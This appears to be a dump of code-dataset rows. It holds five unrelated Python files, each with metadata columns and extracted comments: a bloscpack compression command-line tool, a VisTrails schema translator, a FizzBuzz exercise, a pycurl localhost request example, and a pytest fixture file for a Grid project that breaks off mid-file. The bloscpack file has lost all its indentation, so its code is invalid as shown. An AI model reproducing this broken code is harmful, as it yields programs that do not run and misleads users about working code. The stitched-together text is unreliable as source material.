# vim :set ft=py:
import argparse
from os import path
import json
import pprint
import blosc
from .args import (BloscArgs,
BloscpackArgs,
MetadataArgs,
)
from .append import (append,
_seek_to_metadata,
_rewrite_metadata_fp
)
from .checksums import (CHECKSUMS_AVAIL,
)
from .constants import (SUFFIXES,
CNAME_AVAIL,
EXTENSION,
MIN_CLEVEL,
MAX_CLEVEL,
)
from .defaults import (DEFAULT_TYPESIZE,
DEFAULT_CLEVEL,
DEFAULT_SHUFFLE,
DEFAULT_CNAME,
DEFAULT_CHUNK_SIZE,
DEFAULT_CHECKSUM,
DEFAULT_OFFSETS,
)
from .exceptions import (FileNotFound,
ChunkingException,
FormatVersionMismatch,
ChecksumMismatch,
)
from .file_io import (pack_file_to_file,
unpack_file_from_file,
_read_beginning,
_read_compressed_chunk_fp,
)
from .headers import (decode_blosc_flags,
)
from .pretty import (reverse_pretty,
join_with_eol,
)
from .version import __version__
from . import log
def check_files(in_file, out_file, args):
""" Check files exist/don't exist.
Parameters
----------
in_file : str:
the input file
out_file : str
the output file
args : parser args
any additional arguments from the parser
Raises
------
FileNotFound
in case any of the files isn't found.
"""
if not path.exists(in_file):
raise FileNotFound("input file '%s' does not exist!" % in_file)
if path.exists(out_file):
if not args.force:
raise FileNotFound("output file '%s' exists!" % out_file)
else:
log.verbose("overwriting existing file: '%s'" % out_file)
log.verbose("input file is: '%s'" % in_file)
log.verbose("output file is: '%s'" % out_file)
def _blosc_args_from_args(args):
return BloscArgs(typesize=args.typesize,
clevel=args.clevel,
shuffle=args.shuffle,
cname=args.cname,
)
def process_compression_args(args):
""" Extract and check the compression args after parsing by argparse.
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
blosc_args : tuple of (int, int, bool)
typesize, clevel and shuffle
"""
in_file = args.in_file
out_file = args.out_file or in_file + EXTENSION
return in_file, out_file, _blosc_args_from_args(args)
def process_decompression_args(args):
""" Extract and check the decompression args after parsing by argparse.
Warning: may call sys.exit()
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
"""
in_file = args.in_file
out_file = args.out_file
# remove the extension for output file
if args.no_check_extension:
if out_file is None:
log.error('--no-check-extension requires use of <out_file>')
else:
if in_file.endswith(EXTENSION):
out_file = args.out_file or in_file[:-len(EXTENSION)]
else:
log.error("input file '%s' does not end with '%s'" %
(in_file, EXTENSION))
return in_file, out_file
def process_append_args(args):
original_file = args.original_file
new_file = args.new_file
if not args.no_check_extension and not original_file.endswith(EXTENSION):
log.error("original file '%s' does not end with '%s'" %
(original_file, EXTENSION))
return original_file, new_file
def process_metadata_args(args):
if args.metadata is not None:
try:
with open(args.metadata, 'r') as metadata_file:
return json.loads(metadata_file.read().strip())
except IOError as ioe:
log.error(ioe.message)
def process_nthread_arg(args):
""" Extract and set nthreads. """
if args.nthreads != blosc.ncores:
blosc.set_nthreads(args.nthreads)
log.verbose('using %d thread%s' %
(args.nthreads, 's' if args.nthreads > 1 else ''))
def log_metadata(metadata):
log.normal("Metadata:")
log.normal(pprint.pformat(metadata, width=90))
class BloscPackCustomFormatter(argparse.HelpFormatter):
""" Custom HelpFormatter.
Basically a combination and extension of ArgumentDefaultsHelpFormatter and
RawTextHelpFormatter. Adds default values to argument help, but only if the
default is not in [None, True, False]. Also retains all whitespace as it
is.
"""
def _get_help_string(self, action):
help_ = action.help
if '%(default)' not in action.help \
and action.default not in \
[argparse.SUPPRESS, None, True, False]:
defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
help_ += ' (default: %(default)s)'
return help_
def _split_lines(self, text, width):
return text.splitlines()
def _fill_text(self, text, width, indent):
return ''.join([indent + line for line in text.splitlines(True)])
def _inject_blosc_group(parser):
blosc_group = parser.add_argument_group(title='blosc settings')
blosc_group.add_argument('-t', '--typesize',
metavar='<size>',
default=DEFAULT_TYPESIZE,
type=int,
help='typesize for blosc')
blosc_group.add_argument('-l', '--clevel',
default=DEFAULT_CLEVEL,
choices=range(MIN_CLEVEL, MAX_CLEVEL+1),
metavar='[0, 9]',
type=int,
help='compression level')
blosc_group.add_argument('-s', '--no-shuffle',
action='store_false',
default=DEFAULT_SHUFFLE,
dest='shuffle',
help='deactivate shuffle')
blosc_group.add_argument('-c', '--codec',
metavar='<codec>',
type=str,
choices=CNAME_AVAIL,
default=DEFAULT_CNAME,
dest='cname',
help="codec to be used by Blosc: \n%s"
% join_with_eol(CNAME_AVAIL))
def create_parser():
""" Create and return the parser. """
parser = argparse.ArgumentParser(
#usage='%(prog)s [GLOBAL_OPTIONS] (compress | decompress)
# [COMMAND_OPTIONS] <in_file> [<out_file>]',
description='command line de/compression with blosc',
formatter_class=BloscPackCustomFormatter,
epilog="Additional help for subcommands is available:\n"+
" %(prog)s 'subcommand' [ -h | --help ]")
## print version of bloscpack, python-blosc and blosc itself
version_str = "bloscpack: '%s' " % __version__ + \
"python-blosc: '%s' " % blosc.version.__version__ + \
"blosc: '%s'" % blosc.BLOSC_VERSION_STRING
parser.add_argument('--version', action='version', version=version_str)
output_group = parser.add_mutually_exclusive_group()
output_group.add_argument('-v', '--verbose',
action='store_true',
default=False,
help='be verbose about actions')
output_group.add_argument('-d', '--debug',
action='store_true',
default=False,
help='print debugging output too')
global_group = parser.add_argument_group(title='global options')
global_group.add_argument('-f', '--force',
action='store_true',
default=False,
help='disable overwrite checks for existing files\n' +
'(use with caution)')
class CheckThreadOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not 1 <= value <= blosc.BLOSC_MAX_THREADS:
log.error('%s must be 1 <= n <= %d'
% (option_string, blosc.BLOSC_MAX_THREADS))
setattr(namespace, self.dest, value)
global_group.add_argument('-n', '--nthreads',
metavar='[1, %d]' % blosc.BLOSC_MAX_THREADS,
action=CheckThreadOption,
default=blosc.ncores,
type=int,
dest='nthreads',
help='set number of threads, ' +
'(default: %(default)s (ncores))')
subparsers = parser.add_subparsers(title='subcommands',
metavar='',
dest='subcommand')
compress_parser = subparsers.add_parser('compress',
formatter_class=BloscPackCustomFormatter,
help='perform compression on file')
c_parser = subparsers.add_parser('c',
formatter_class=BloscPackCustomFormatter,
help="alias for 'compress'")
class CheckChunkSizeOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if value == 'max':
value = blosc.BLOSC_MAX_BUFFERSIZE
else:
try:
# try to get the value as bytes
if value[-1] in SUFFIXES.keys():
value = reverse_pretty(value)
# seems to be intended to be a naked int
else:
value = int(value)
except ValueError as ve:
log.error('%s error: %s' % (option_string, str(ve)))
if value < 0:
log.error('%s must be > 0' % option_string)
setattr(namespace, self.dest, value)
for p in [compress_parser, c_parser]:
_inject_blosc_group(p)
bloscpack_group = p.add_argument_group(title='bloscpack settings')
bloscpack_group.add_argument('-z', '--chunk-size',
metavar='<size>',
action=CheckChunkSizeOption,
type=str,
default=DEFAULT_CHUNK_SIZE,
dest='chunk_size',
help="set desired chunk size or 'max'")
checksum_format = join_with_eol(CHECKSUMS_AVAIL[0:3]) + \
join_with_eol(CHECKSUMS_AVAIL[3:6]) + \
join_with_eol(CHECKSUMS_AVAIL[6:])
checksum_help = 'set desired checksum:\n' + checksum_format
bloscpack_group.add_argument('-k', '--checksum',
metavar='<checksum>',
type=str,
choices=CHECKSUMS_AVAIL,
default=DEFAULT_CHECKSUM,
dest='checksum',
help=checksum_help)
bloscpack_group.add_argument('-o', '--no-offsets',
action='store_false',
default=DEFAULT_OFFSETS,
dest='offsets',
help='deactivate offsets')
bloscpack_group.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
decompress_parser = subparsers.add_parser('decompress',
formatter_class=BloscPackCustomFormatter,
help='perform decompression on file')
d_parser = subparsers.add_parser('d',
formatter_class=BloscPackCustomFormatter,
help="alias for 'decompress'")
for p in [decompress_parser, d_parser]:
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking input file for extension (*.blp)\n' +
'(requires use of <out_file>)')
for p, help_in, help_out in [(compress_parser,
'file to be compressed',
'file to compress to'),
(c_parser,
'file to be compressed',
'file to compress to'),
(decompress_parser,
'file to be decompressed',
'file to decompress to'),
(d_parser,
'file to be decompressed',
'file to decompress to'),
]:
p.add_argument('in_file',
metavar='<in_file>',
type=str,
default=None,
help=help_in)
p.add_argument('out_file',
metavar='<out_file>',
type=str,
nargs='?',
default=None,
help=help_out)
append_parser = subparsers.add_parser('append',
formatter_class=BloscPackCustomFormatter,
help='append data to a compressed file')
a_parser = subparsers.add_parser('a',
formatter_class=BloscPackCustomFormatter,
help="alias for 'append'")
for p in (append_parser, a_parser):
_inject_blosc_group(p)
p.add_argument('original_file',
metavar='<original_file>',
type=str,
help="file to append to")
p.add_argument('new_file',
metavar='<new_file>',
type=str,
help="file to append from")
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking original file for extension (*.blp)\n')
p.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
info_parser = subparsers.add_parser('info',
formatter_class=BloscPackCustomFormatter,
help='print information about a compressed file')
i_parser = subparsers.add_parser('i',
formatter_class=BloscPackCustomFormatter,
help="alias for 'info'")
for p in (info_parser, i_parser):
p.add_argument('file_',
metavar='<file>',
type=str,
default=None,
help="file to show info for")
return parser
def main():
parser = create_parser()
log.set_prefix(parser.prog)
args = parser.parse_args()
if args.verbose:
log.LEVEL = log.VERBOSE
elif args.debug:
log.LEVEL = log.DEBUG
log.debug('command line argument parsing complete')
log.debug('command line arguments are: ')
for arg, val in sorted(vars(args).items()):
log.debug(' %s: %s' % (arg, str(val)))
process_nthread_arg(args)
# compression and decompression handled via subparsers
if args.subcommand in ['compress', 'c']:
log.verbose('getting ready for compression')
in_file, out_file, blosc_args = process_compression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
metadata = process_metadata_args(args)
bloscpack_args = BloscpackArgs(offsets=args.offsets,
checksum=args.checksum)
try:
pack_file_to_file(in_file, out_file,
chunk_size=args.chunk_size,
metadata=metadata,
blosc_args=blosc_args,
bloscpack_args=bloscpack_args,
metadata_args=MetadataArgs())
except ChunkingException as ce:
log.error(str(ce))
elif args.subcommand in ['decompress', 'd']:
log.verbose('getting ready for decompression')
in_file, out_file = process_decompression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
try:
metadata = unpack_file_from_file(in_file, out_file)
if metadata:
log_metadata(metadata)
except FormatVersionMismatch as fvm:
log.error(fvm.message)
except ChecksumMismatch as csm:
log.error(csm.message)
elif args.subcommand in ['append', 'a']:
log.verbose('getting ready for append')
original_file, new_file = process_append_args(args)
try:
if not path.exists(original_file):
raise FileNotFound("original file '%s' does not exist!" %
original_file)
if not path.exists(new_file):
raise FileNotFound("new file '%s' does not exist!" %
new_file)
except FileNotFound as fnf:
log.error(str(fnf))
log.verbose("original file is: '%s'" % original_file)
log.verbose("new file is: '%s'" % new_file)
blosc_args = _blosc_args_from_args(args)
metadata = process_metadata_args(args)
append(original_file, new_file, blosc_args=blosc_args)
if metadata is not None:
with open(original_file, 'r+b') as fp:
_seek_to_metadata(fp)
_rewrite_metadata_fp(fp, metadata)
elif args.subcommand in ('info', 'i'):
try:
if not path.exists(args.file_):
raise FileNotFound("file '%s' does not exist!" %
args.file_)
except FileNotFound as fnf:
log.error(str(fnf))
try:
with open(args.file_, 'rb') as fp:
bloscpack_header, metadata, metadata_header, offsets = \
_read_beginning(fp)
checksum_impl = bloscpack_header.checksum_impl
# get the header of the first chunk
_, blosc_header, _ = _read_compressed_chunk_fp(
fp, checksum_impl)
except ValueError as ve:
log.error(str(ve) + "\n" +
"This might not be a bloscpack compressed file.")
log.normal(bloscpack_header.pformat())
if offsets:
log.normal("'offsets':")
log.normal("[%s,...]" % (",".join(str(o) for o in offsets[:5])))
if metadata is not None:
log_metadata(metadata)
log.normal(metadata_header.pformat())
log.normal("First chunk blosc header:")
log.normal(str(blosc_header))
log.normal("First chunk blosc flags: ")
log.normal(str(decode_blosc_flags(blosc_header['flags'])))
else: # pragma: no cover
# in Python 3 subcommands are not mandatory by default
parser.print_usage()
log.error('too few arguments', 2)
log.verbose('done')
| en | 0.548514 | #!/usr/bin/env python # -*- coding: utf-8 -*- # vim :set ft=py: Check files exist/don't exist. Parameters ---------- in_file : str: the input file out_file : str the output file args : parser args any additional arguments from the parser Raises ------ FileNotFound in case any of the files isn't found. Extract and check the compression args after parsing by argparse. Parameters ---------- args : argparse.Namespace the parsed command line arguments Returns ------- in_file : str the input file name out_file : str the out_file name blosc_args : tuple of (int, int, bool) typesize, clevel and shuffle Extract and check the decompression args after parsing by argparse. Warning: may call sys.exit() Parameters ---------- args : argparse.Namespace the parsed command line arguments Returns ------- in_file : str the input file name out_file : str the out_file name # remove the extension for output file Extract and set nthreads. Custom HelpFormatter. Basically a combination and extension of ArgumentDefaultsHelpFormatter and RawTextHelpFormatter. Adds default values to argument help, but only if the default is not in [None, True, False]. Also retains all whitespace as it is. Create and return the parser. #usage='%(prog)s [GLOBAL_OPTIONS] (compress | decompress) # [COMMAND_OPTIONS] <in_file> [<out_file>]', ## print version of bloscpack, python-blosc and blosc itself # try to get the value as bytes # seems to be intended to be a naked int # compression and decompression handled via subparsers # get the header of the first chunk # pragma: no cover # in Python 3 subcommands are not mandatory by default | 2.428568 | 2 |
vistrails/db/versions/v1_0_5/translate/v1_0_4.py | remram44/VisTrails-mybinder | 0 | 6632508 | ###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: <EMAIL>
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
from vistrails.db.versions.v1_0_5.domain import DBVistrail, DBVistrailVariable, \
DBWorkflow, DBLog, DBRegistry, \
DBAdd, DBChange, DBDelete, \
DBPortSpec, DBPortSpecItem, \
DBParameterExploration, \
DBPEParameter, DBPEFunction, \
IdScope, DBAbstraction, \
DBModule, DBGroup, DBAnnotation, \
DBActionAnnotation, DBStartup, \
DBConfigKey, DBConfigBool, DBConfigStr, \
DBConfigInt, DBConfigFloat, \
DBConfiguration, DBStartupPackage, \
DBLoopIteration, DBLoopExec, \
DBModuleExec, DBGroupExec
id_scope = None
def translateVistrail(_vistrail):
""" Translate old annotation based vistrail variables to new
DBVistrailVariable class """
global id_scope
def update_workflow(old_obj, trans_dict):
return DBWorkflow.update_version(old_obj.db_workflow,
trans_dict, DBWorkflow())
translate_dict = {'DBGroup': {'workflow': update_workflow}}
vistrail = DBVistrail()
id_scope = vistrail.idScope
vistrail = DBVistrail.update_version(_vistrail, translate_dict, vistrail)
vistrail.db_version = '1.0.5'
return vistrail
def translateWorkflow(_workflow):
global id_scope
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
translate_dict = {'DBGroup': {'workflow': update_workflow}}
workflow = DBWorkflow()
id_scope = IdScope(remap={DBAbstraction.vtType: DBModule.vtType, DBGroup.vtType: DBModule.vtType})
workflow = DBWorkflow.update_version(_workflow, translate_dict, workflow)
workflow.db_version = '1.0.5'
return workflow
def translateLog(_log):
translate_dict = {}
log = DBLog.update_version(_log, translate_dict)
log.db_version = '1.0.5'
return log
def translateRegistry(_registry):
global id_scope
translate_dict = {}
registry = DBRegistry()
id_scope = registry.idScope
registry = DBRegistry.update_version(_registry, translate_dict, registry)
registry.db_version = '1.0.5'
return registry
def translateStartup(_startup):
# format is {<old_name>: <new_name>} or
# {<old_name>: (<new_name> | None, [conversion_f | None, inner_d | None])
# conversion_f is a function that mutates the value and
# inner_d recurses the translation for inner configurations
translate_dict = {}
startup = DBStartup()
startup = DBStartup.update_version(_startup, translate_dict, startup)
startup.db_version = '1.0.5'
return startup
| ###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: <EMAIL>
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
from vistrails.db.versions.v1_0_5.domain import DBVistrail, DBVistrailVariable, \
DBWorkflow, DBLog, DBRegistry, \
DBAdd, DBChange, DBDelete, \
DBPortSpec, DBPortSpecItem, \
DBParameterExploration, \
DBPEParameter, DBPEFunction, \
IdScope, DBAbstraction, \
DBModule, DBGroup, DBAnnotation, \
DBActionAnnotation, DBStartup, \
DBConfigKey, DBConfigBool, DBConfigStr, \
DBConfigInt, DBConfigFloat, \
DBConfiguration, DBStartupPackage, \
DBLoopIteration, DBLoopExec, \
DBModuleExec, DBGroupExec
id_scope = None
def translateVistrail(_vistrail):
""" Translate old annotation based vistrail variables to new
DBVistrailVariable class """
global id_scope
def update_workflow(old_obj, trans_dict):
return DBWorkflow.update_version(old_obj.db_workflow,
trans_dict, DBWorkflow())
translate_dict = {'DBGroup': {'workflow': update_workflow}}
vistrail = DBVistrail()
id_scope = vistrail.idScope
vistrail = DBVistrail.update_version(_vistrail, translate_dict, vistrail)
vistrail.db_version = '1.0.5'
return vistrail
def translateWorkflow(_workflow):
global id_scope
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
translate_dict = {'DBGroup': {'workflow': update_workflow}}
workflow = DBWorkflow()
id_scope = IdScope(remap={DBAbstraction.vtType: DBModule.vtType, DBGroup.vtType: DBModule.vtType})
workflow = DBWorkflow.update_version(_workflow, translate_dict, workflow)
workflow.db_version = '1.0.5'
return workflow
def translateLog(_log):
translate_dict = {}
log = DBLog.update_version(_log, translate_dict)
log.db_version = '1.0.5'
return log
def translateRegistry(_registry):
global id_scope
translate_dict = {}
registry = DBRegistry()
id_scope = registry.idScope
registry = DBRegistry.update_version(_registry, translate_dict, registry)
registry.db_version = '1.0.5'
return registry
def translateStartup(_startup):
# format is {<old_name>: <new_name>} or
# {<old_name>: (<new_name> | None, [conversion_f | None, inner_d | None])
# conversion_f is a function that mutates the value and
# inner_d recurses the translation for inner configurations
translate_dict = {}
startup = DBStartup()
startup = DBStartup.update_version(_startup, translate_dict, startup)
startup.db_version = '1.0.5'
return startup
| en | 0.596797 | ############################################################################### ## ## Copyright (C) 2014-2016, New York University. ## Copyright (C) 2011-2014, NYU-Poly. ## Copyright (C) 2006-2011, University of Utah. ## All rights reserved. ## Contact: <EMAIL> ## ## This file is part of VisTrails. ## ## "Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## - Redistributions of source code must retain the above copyright notice, ## this list of conditions and the following disclaimer. ## - Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## - Neither the name of the New York University nor the names of its ## contributors may be used to endorse or promote products derived from ## this software without specific prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, ## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR ## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR ## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; ## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, ## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ## ############################################################################### Translate old annotation based vistrail variables to new DBVistrailVariable class # format is {<old_name>: <new_name>} or # {<old_name>: (<new_name> | None, [conversion_f | None, inner_d | None]) # conversion_f is a function that mutates the value and # inner_d recurses the translation for inner configurations | 0.96853 | 1 |
solutions/Elementary/Fizz Buzz/1.py | Amaimersion/CheckiO-solutions | 0 | 6632509 | #Your optional code here
#You can import some modules or create additional functions
def checkio(number):
string = ""
if (number % 3 == 0) and (number % 5 == 0):
string = "Fizz Buzz"
elif (number % 3 == 0):
string = "Fizz"
elif (number % 5 == 0):
string = "Buzz"
else:
string = str(number)
return string
#Some hints:
#Convert a number in the string with str(n)
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio(15) == "Fizz Buzz", "15 is divisible by 3 and 5"
assert checkio(6) == "Fizz", "6 is divisible by 3"
assert checkio(5) == "Buzz", "5 is divisible by 5"
assert checkio(7) == "7", "7 is not divisible by 3 or 5"
| #Your optional code here
#You can import some modules or create additional functions
def checkio(number):
string = ""
if (number % 3 == 0) and (number % 5 == 0):
string = "Fizz Buzz"
elif (number % 3 == 0):
string = "Fizz"
elif (number % 5 == 0):
string = "Buzz"
else:
string = str(number)
return string
#Some hints:
#Convert a number in the string with str(n)
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio(15) == "Fizz Buzz", "15 is divisible by 3 and 5"
assert checkio(6) == "Fizz", "6 is divisible by 3"
assert checkio(5) == "Buzz", "5 is divisible by 5"
assert checkio(7) == "7", "7 is not divisible by 3 or 5"
| en | 0.593756 | #Your optional code here #You can import some modules or create additional functions #Some hints: #Convert a number in the string with str(n) #These "asserts" using only for self-checking and not necessary for auto-testing | 4.052959 | 4 |
sample/openFileExample.py | luoluyao/AppetizerRemoteCall | 0 | 6632510 | import pycurl
import io
import json
jsonStr = '{"port":8099, "fileName":"plugin.xml", "line":5, "col":5, "offsetline":4}'
jsonStr1 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":4}'
jsonStr2 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":5, "offsetline":0}'
jsonStr3 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":0}'
cj = json.loads(jsonStr)
buf = io.StringIO()
curl = pycurl.Curl()
curl.setopt(curl.URL, 'http://localhost:%s?message=%s:%d:%d:%d' % (cj['port'], cj['fileName'], cj['line'], cj['col'], cj['offsetline']))
curl.setopt(curl.WRITEFUNCTION, buf.write)
try:
curl.perform()
# todo: process return values
except pycurl.error as error:
pass
print(buf.getvalue())
buf.close()
| import pycurl
import io
import json
jsonStr = '{"port":8099, "fileName":"plugin.xml", "line":5, "col":5, "offsetline":4}'
jsonStr1 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":4}'
jsonStr2 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":5, "offsetline":0}'
jsonStr3 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":0}'
cj = json.loads(jsonStr)
buf = io.StringIO()
curl = pycurl.Curl()
curl.setopt(curl.URL, 'http://localhost:%s?message=%s:%d:%d:%d' % (cj['port'], cj['fileName'], cj['line'], cj['col'], cj['offsetline']))
curl.setopt(curl.WRITEFUNCTION, buf.write)
try:
curl.perform()
# todo: process return values
except pycurl.error as error:
pass
print(buf.getvalue())
buf.close()
| es | 0.169751 | # todo: process return values | 2.530338 | 3 |
test/conftest.py | Quisher/Grid | 0 | 6632511 | <reponame>Quisher/Grid
import pytest
import torch
from multiprocessing import Process
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
import os
import sys
# We need to add our rest api as a path since it is a separate application
# deployed on Heroku:
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/../app/pg_rest_api")
from pg_app import create_app
import syft
from syft import TorchHook
from test import IDS, PORTS, GATEWAY_URL, GATEWAY_PORT
import time
import requests
import json
import grid as gr
@pytest.fixture()
def start_proc(): # pragma: no cover
""" helper function for spinning up a websocket participant """
def _start_proc(participant, kwargs):
def target():
server = participant(**kwargs)
server.start()
p = Process(target=target)
p.start()
return p
return _start_proc
@pytest.fixture(scope="session", autouse=True)
def node_infos():
return zip(IDS, PORTS)
@pytest.fixture(scope="session", autouse=True)
def init_gateway():
def setUpGateway(port):
os.environ["SECRET_KEY"] = "Secretkeyhere"
from gateway.app import create_app
app = create_app(debug=False)
app.run(host="0.0.0.0", port=GATEWAY_PORT)
# Init Grid Gateway
p = Process(target=setUpGateway, args=(GATEWAY_PORT,))
p.start()
time.sleep(5)
yield
p.terminate()
@pytest.fixture(scope="session", autouse=True)
def init_nodes(node_infos):
BASEDIR = os.path.dirname(os.path.dirname(__file__))
def setUpNode(port, node_id):
from app.websocket.app import create_app as ws_create_app
from app.websocket.app import socketio
db_path = "sqlite:///" + BASEDIR + "/database" + node_id + ".db"
requests.post(
GATEWAY_URL + "/join",
data=json.dumps(
{"node-id": node_id, "node-address": "http://localhost:" + port + "/"}
),
)
socketio.async_mode = "threading"
app = ws_create_app(
debug=False, tst_config={"SQLALCHEMY_DATABASE_URI": db_path}
)
socketio.run(app, host="0.0.0.0", port=port)
jobs = []
# Init Grid Nodes
for (node_id, port) in node_infos:
config = (node_id, port)
p = Process(target=setUpNode, args=(port, node_id))
p.start()
jobs.append(p)
time.sleep(5)
yield
for job in jobs:
job.terminate()
def create_websocket_client(hook, port, id):
node = gr.WebsocketGridClient(hook, "http://localhost:" + port + "/", id=id)
node.connect()
time.sleep(0.1)
return node
@pytest.fixture(scope="function")
def connected_node(hook):
nodes = {}
for (node_id, port) in zip(IDS, PORTS):
node = create_websocket_client(hook, port, node_id)
nodes[node_id] = node
yield nodes
for node in nodes:
nodes[node].disconnect()
time.sleep(0.1)
@pytest.fixture(scope="function")
def grid_network():
my_grid = gr.GridNetwork(GATEWAY_URL)
yield my_grid
my_grid.disconnect_nodes()
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook
| import pytest
import torch
from multiprocessing import Process
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
import os
import sys
# We need to add our rest api as a path since it is a separate application
# deployed on Heroku:
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/../app/pg_rest_api")
from pg_app import create_app
import syft
from syft import TorchHook
from test import IDS, PORTS, GATEWAY_URL, GATEWAY_PORT
import time
import requests
import json
import grid as gr
@pytest.fixture()
def start_proc(): # pragma: no cover
""" helper function for spinning up a websocket participant """
def _start_proc(participant, kwargs):
def target():
server = participant(**kwargs)
server.start()
p = Process(target=target)
p.start()
return p
return _start_proc
@pytest.fixture(scope="session", autouse=True)
